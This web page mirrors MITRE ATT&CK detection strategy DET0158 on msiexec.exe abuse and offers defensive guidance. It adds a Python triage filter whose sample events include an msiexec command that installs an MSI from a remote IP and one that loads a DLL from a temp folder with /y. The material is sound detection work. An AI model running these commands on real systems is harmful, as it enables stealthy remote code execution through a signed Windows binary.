MITRE ATT&CK® Detection Strategy

DET0158: Detection of Msiexec Abuse for Local, Network, and DLL Execution


Enterprise | DET0158 | Detection Strategy | Object v1.0
Glexia's Take

Analyst context for executives and security teams

Analyst confidence: Medium

This detection strategy matters because it focuses on abuse of msiexec.exe, a legitimate Microsoft Windows Installer utility that adversaries may use to proxy execution of malicious payloads, including local or network-accessible MSI files and DLLs. For leaders, the business issue is not the installer tool itself, but whether the organization can distinguish normal software installation activity from stealthy execution through a trusted, signed Windows binary.

Executive priority

Prioritize this as a control-validation topic for Windows environments because the related ATT&CK technique, T1218.007 Msiexec, sits in a stealth context and can blur the line between routine administration and adversary execution. Executives should ask whether SOC, endpoint, and incident response teams have enough process, command-line, network path, and installer activity evidence to investigate suspicious msiexec behavior without disrupting legitimate software deployment operations.

Technical view

The supplied ATT&CK object is a detection strategy for T1218.007 Msiexec, but it does not include official detection logic or platform metadata of its own. The relationship context identifies the relevant behavior: msiexec.exe may be abused to execute local or network-accessible MSI files and can also execute DLLs. SOC and detection engineering teams should validate visibility around msiexec process execution, parent-child process relationships, command-line arguments, file paths, network locations, and DLL-related execution indicators, especially where msiexec activity occurs outside expected software deployment workflows.

Likely telemetry

  • Endpoint process creation events for msiexec.exe
  • Command-line arguments associated with msiexec execution
  • Parent and child process relationships involving msiexec.exe
  • File access or execution records for local MSI packages
  • Evidence of msiexec referencing network-accessible installer locations

Detection direction

  • Baseline legitimate msiexec usage from software deployment, patching, and administrative installation workflows before alerting broadly.
  • Review msiexec executions that reference unusual local paths, user-writable locations, or network-accessible resources, while accounting for legitimate enterprise installer shares.
  • Correlate msiexec process activity with parent process context to distinguish expected management tooling from unexpected user, script, or document-driven launch patterns.
  • Tune detections for stealthy use of a trusted Windows binary rather than treating Microsoft signature alone as benign.
  • Use the relationship to T1218.007 as the primary detection scope, since this detection-strategy object does not provide official detection text.
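The telemetry list and detection direction above can be turned into a first-pass triage filter. The following is an added example written for this page, not Glexia's or MITRE's code: it applies the baseline-then-review logic to constructed process-creation events (a simplified Sysmon Event ID 1 / EDR shape), flagging msiexec executions that reference HTTP(S) URLs, unsanctioned UNC shares or user-writable paths, that load a DLL through the documented /y or /z switches, or that are launched by document or script hosts. The sanctioned parent paths, the installer share and all sample events are hypothetical placeholders to be replaced with your own inventory and telemetry.

```python
"""Added example, not from the Glexia page or MITRE: a triage filter that applies the
detection direction above to constructed Windows process-creation events."""
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    """A simplified process-creation record (Sysmon Event ID 1 / EDR shape)."""
    image: str          # full path of the created process
    command_line: str
    parent_image: str   # full path of the parent process
    user: str


# Environment baseline: hypothetical placeholder values, replace with your own inventory.
SANCTIONED_PARENTS = {
    r"c:\windows\ccmsetup\ccmexec.exe",   # hypothetical endpoint-management agent path
    r"c:\windows\system32\services.exe",  # the MSI service respawns msiexec during installs
}
SANCTIONED_SHARES = ("\\\\deploy01\\installers\\",)  # hypothetical approved installer share

URL_RE = re.compile(r"https?://\S+", re.I)
UNC_RE = re.compile(r'\\\\[\w.-]+\\[^\s"]+')
USER_WRITABLE_RE = re.compile(
    r"(?:\\users\\[^\\]+\\(?:appdata|downloads|desktop|documents)|\\programdata|\\windows\\temp)\\",
    re.I,
)
# /y and /z are the documented msiexec switches that load a DLL to register or unregister it.
DLL_SWITCH_RE = re.compile(r"(?:^|\s)/[yz](?:\s|$)", re.I)
DOCUMENT_OR_SCRIPT_PARENTS = {
    "winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
    "wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe",
}


def is_msiexec(ev: ProcessEvent) -> bool:
    return ev.image.lower().endswith("\\msiexec.exe")


def triage(ev: ProcessEvent) -> list[str]:
    """Return the reasons this msiexec execution deserves analyst review.

    An empty list means the event is out of scope or within the sanctioned baseline.
    """
    if not is_msiexec(ev):
        return []
    cmd = ev.command_line
    reasons: list[str] = []

    for unc in UNC_RE.findall(cmd):
        if not unc.lower().startswith(SANCTIONED_SHARES):
            reasons.append(f"network installer path outside sanctioned shares: {unc}")
    if URL_RE.search(cmd):
        reasons.append("installer referenced by HTTP(S) URL")
    if USER_WRITABLE_RE.search(cmd):
        reasons.append("package or DLL in user-writable location")
    if DLL_SWITCH_RE.search(cmd):
        reasons.append("DLL load via /y or /z switch")
    parent_name = ev.parent_image.lower().rsplit("\\", 1)[-1]
    if parent_name in DOCUMENT_OR_SCRIPT_PARENTS:
        reasons.append(f"launched from document or script host: {parent_name}")

    # Sanctioned deployment tooling legitimately stages packages in temp folders and
    # pulls from shares, so it suppresses the path signals but never the DLL-load signal.
    if ev.parent_image.lower() in SANCTIONED_PARENTS:
        reasons = [r for r in reasons if r.startswith("DLL load")]
    return reasons


# Constructed sample events (not real telemetry).
MSIEXEC = r"C:\Windows\System32\msiexec.exe"
SAMPLE_EVENTS = {
    "sanctioned_share_install": ProcessEvent(
        MSIEXEC, r"msiexec.exe /i \\deploy01\installers\7zip.msi /qn",
        r"C:\Windows\ccmsetup\ccmexec.exe", "NT AUTHORITY\\SYSTEM"),
    "url_from_script_host": ProcessEvent(
        MSIEXEC, "msiexec.exe /q /i http://203.0.113.10/update.msi",
        r"C:\Windows\System32\wscript.exe", r"CORP\alice"),
    "dll_from_office": ProcessEvent(
        MSIEXEC, r"msiexec /y C:\Users\alice\AppData\Local\Temp\helper.dll",
        r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE", r"CORP\alice"),
    "dll_under_sanctioned_parent": ProcessEvent(
        MSIEXEC, r"msiexec /y C:\Windows\Temp\helper.dll",
        r"C:\Windows\System32\services.exe", "NT AUTHORITY\\SYSTEM"),
    "not_msiexec": ProcessEvent(
        r"C:\Windows\System32\notepad.exe", "notepad.exe notes.txt",
        r"C:\Windows\explorer.exe", r"CORP\alice"),
}


def triage_all(events: dict[str, ProcessEvent]) -> dict[str, list[str]]:
    """Run triage over a batch; only events with at least one reason are returned."""
    return {name: reasons for name, ev in events.items() if (reasons := triage(ev))}


if __name__ == "__main__":
    for name, reasons in triage_all(SAMPLE_EVENTS).items():
        print(name)
        for r in reasons:
            print("  -", r)
```

The design choice worth noting is the asymmetry in the last step of `triage`: a sanctioned deployment agent as parent suppresses the path-based signals, because such agents routinely stage packages in temp directories and pull from shares, but it does not suppress a DLL load, which is rarely part of a normal package install. Tune the parent and share allowlists from your own baseline before using this at alert volume.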

Mitigation priorities

  • Confirm that endpoint telemetry captures process creation and command-line detail for Windows systems where msiexec is present.
  • Establish an approved software installation baseline, including sanctioned deployment tools and network installer locations.
  • Restrict or monitor software installation paths and network shares according to least-privilege and change-management requirements.
  • Ensure incident responders have playbooks for investigating suspicious installer execution without assuming all msiexec activity is malicious.
  • Use detection validation exercises to test whether local MSI, network-based MSI, and DLL-related msiexec activity would be visible to the SOC.

Analyst notes and limits

This take is based on the detection strategy DET0158 and its relationship to ATT&CK technique T1218.007 Msiexec. The ATT&CK object itself provides no official description, no official detection text, no tactics, and no platforms. The practical guidance therefore relies on the supplied relationship context, which identifies msiexec abuse for local, network, and DLL execution and indicates the related technique is Windows-focused.

Local environment evidence is required to determine what is suspicious, because msiexec is also a normal administrative and software installation utility. This summary does not assert active exploitation, attribution, customer exposure, or guaranteed detection coverage. No vendor-specific controls or detection rules are provided by the supplied ATT&CK fields.

Official MITRE ATT&CK definition

Detection of Msiexec Abuse for Local, Network, and DLL Execution

No official description is available in the imported ATT&CK source object.


Glexia analysis

How security teams should use this page

Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.

ATT&CK relationship table

Techniques used

This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.

Domain | ID | Name | Relationship / procedure
Enterprise | T1218.007 | Msiexec (sub-technique) | This object detects Msiexec.

Change history

Object version and sync metadata

The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE's own release notes and roadmap, see the Updates page under ATT&CK resources.

ATT&CK release: 19.1
Object version: 1.0
Created:
Modified:
Raw hash: 6fe29f8c99f63fb1...

Imported snapshots across ATT&CK releases (1)

Release | Bundle imported | Object version | Modified | Status | Raw hash
19.1 | | 1.0 | | Current bundle | 6fe29f8c99f6…

Raw source

Mirrored ATT&CK source object

The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.

Source references

External references and citations

MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.

  1. mitre-attack: DET0158

Source and licensing

Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.